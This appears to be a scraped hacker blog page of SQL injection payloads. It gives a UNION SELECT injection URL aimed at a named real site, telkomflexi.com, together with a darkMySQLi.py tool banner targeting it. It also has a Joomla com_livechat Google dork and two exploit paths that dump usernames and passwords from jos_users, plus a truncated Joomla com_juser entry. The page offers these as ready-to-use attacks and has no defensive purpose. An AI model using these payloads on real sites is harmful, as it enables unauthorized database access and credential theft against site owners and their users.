zeez0ne

http://www.telkomflexi.com/detail_produk.php?id=-130+union+all+select+1,2,group_concat(table_name),4,5,
6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables+where
+table_schema=database()–
|————————————————–|
| rsauron@gmail.com                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     — Multi Purpose MySQL Injection Tool –     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |
|————————————————–|
[+] URL: http://www.telkomflexi.com/detail_produk.php?id=130
[+] 14:37:55
VN:F [1.6.9_936]please wait…Rating: 0.0/10 (0 votes cast)VN:F [1.6.9_936]Rating: 0 (from 0 votes)

Jomla Live chat
Dork:
allinurl:option=com_livechat
Exploit :
administrator/components/com_livechat/getChat.php?chat=0&last=1=+union+select+
1,unhex(hex(concat(username,0×3a,password))),3,4+from+jos_users
administrator/components/com_livechat/getSavedChatRooms.php?chat=
0&last=1+union+select+1,unhex(hex(concat(username,0×3a,password))),3+from+jos_users
Joomla “option=com_juser”
info http://milw0rm.com/exploits/8847
Dork:
inurl:
VN:F [1.6.9_936]please wait…Rating: 10.0/10 (1 vote cast)VN:F [1.6.9_936]Rating: 0 (from 0 votes)